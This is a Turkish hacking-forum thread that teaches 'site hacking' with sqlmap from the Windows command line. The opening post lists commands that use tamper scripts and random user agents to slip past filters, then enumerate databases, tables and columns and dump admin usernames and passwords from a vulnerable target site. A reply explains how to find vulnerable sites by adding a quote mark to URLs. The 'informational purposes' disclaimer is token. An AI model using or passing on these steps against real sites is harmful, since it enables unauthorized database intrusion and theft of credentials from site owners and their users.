CMD İle SQL Injection Hack [Windows] - Site Hackleme / OBT İs HerYerDe

4tomx

4tomx

Üye
30 May 2019
102
22
OBT is HeRYerDe' Alıntı:
Dosyalar & Tool




+ Python 3.10.1 adlı setup ile Python kuruyoruz
+ sqlmap adlı dosyayı direkt Yerel Disk C'ye atıyoruz
+ sqlmap Klasörü İçindeki Dosyayı "sqlmap" Diye Değiştiriyoruz

Python İndirmek İçin Tıklayınız +++ SQLMAP İndirmek İçin Tıklayınız



sqlmap'ı CMD ile çalıştırma ;

Yukarıdakileri yaptıktan sonra Başlat'tan CMD konsolunu açalım ve konsol "C:" dizinine gelene kadar şu kodu yazalım ;
Kod: 
cd ../../



Konsol C:\ dizinine geldikten sonrada şu kodu yazalım ;

Kod: 
cd sqlmap

Database Çekimi ;

NOT: '403' Hatası Almamak İçin Verdiğim Parametreleri Kullanınız.
Kod: 
python sqlmap.py -u sqlaçıklıhedefsite --random-agent -v3 --tamper="between,randomcase,space2comment" --dbs

Veri Tabanı İsimleri Geldikten Sonra Şu Komutu Giriyoruz ; [information_schema Bizi İlgilendirmemektedir.]

Kod: 
python sqlmap.py -u sqlaçıklıhedefsite --random-agent -v3 --tamper="between,randomcase,space2comment" -D DATABASENAME --Tables

Tablolar Geldikten Sonra İse Gireceğimiz Komut Bu ;

[Admin Ve Password Bilgilerinin Olduğu Tabloyu Tahmin Edebilirsiniz, Bulduk Varsayalım.]
Kod: 
python sqlmap.py -u sqlaçıklıhedefsite --random-agent -v3 --tamper="between,randomcase,space2comment" -D DATABASENAME -T TABLONAME --Columns

Kolonları Bulduktan Sonra Son Olarak Bu Komutu Giriyoruz ;

[Admin Ve Password Bilgilerini Çekeceğiz.]
Kod: 
python sqlmap.py -u sqlaçıklıhedefsite --random-agent -v3 --tamper="between,randomcase,space2comment" -D DATABASENAME -T TABLESNAME -C COLUMNNAME (örn: admin,pass) --dump



Beğenmeyi Unutmayın! İYİ FORUMLAR.

-Bilgilendirme Amaçlıdır-

ᴏʙᴛ ɪs ʜᴇʀʏᴇʀ
Genişletmek için tıkla ...
Başaralı ellerine sağlık
 
LorexOfficiall

LorexOfficiall

Yeni üye
19 Nis 2022
5
1
Bana şu hatayı veriyor

4cmv37y.png
 
OBT is HeRYerDe

OBT is HeRYerDe

Kıdemli Üye
11 Ara 2020
2,682
1,535
Saldırı Timleri Grup Komutanlığı
LorexOfficiall' Alıntı:
Peki SQL açığı olup olmadığını nerden öğrenebilirim?
Genişletmek için tıkla ...
URL'nin Sonuna ' koyunca Syntax Hatası veriyorsa vardır, Dilerseniz şu konumu da okuyun.

SQL Açığı İle Site Hacklemek [Windows] - Uygulamalı

Hepinize Merhaba Değerli THT Üyeleri; Forumda "Site Nasıl Hacklenir / Site Hackleme Yolları" Gibi Çok Fazla Konu Açılıyor, Ben De En Kolay Site Hackleme Yöntemini Sizlere Sunuyorum. Daha Önceden 'sqlmap' Aracından Bahsetmiş; Nasıl Kurulacağını, Nasıl Kullanılacağından vb. Anlatmıştım. Biz CMD...
www.turkhackteam.org www.turkhackteam.org
 
LorexOfficiall

LorexOfficiall

Yeni üye
19 Nis 2022
5
1
OBT is HeRYerDe' Alıntı:
URL'nin Sonuna ' koyunca Syntax Hatası veriyorsa vardır, Dilerseniz şu konumu da okuyun.

SQL Açığı İle Site Hacklemek [Windows] - Uygulamalı

Hepinize Merhaba Değerli THT Üyeleri; Forumda "Site Nasıl Hacklenir / Site Hackleme Yolları" Gibi Çok Fazla Konu Açılıyor, Ben De En Kolay Site Hackleme Yöntemini Sizlere Sunuyorum. Daha Önceden 'sqlmap' Aracından Bahsetmiş; Nasıl Kurulacağını, Nasıl Kullanılacağından vb. Anlatmıştım. Biz CMD...
www.turkhackteam.org www.turkhackteam.org
Genişletmek için tıkla ...
teşekkürler
 
Cevap yazmak için giriş yap yada kayıt ol.
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.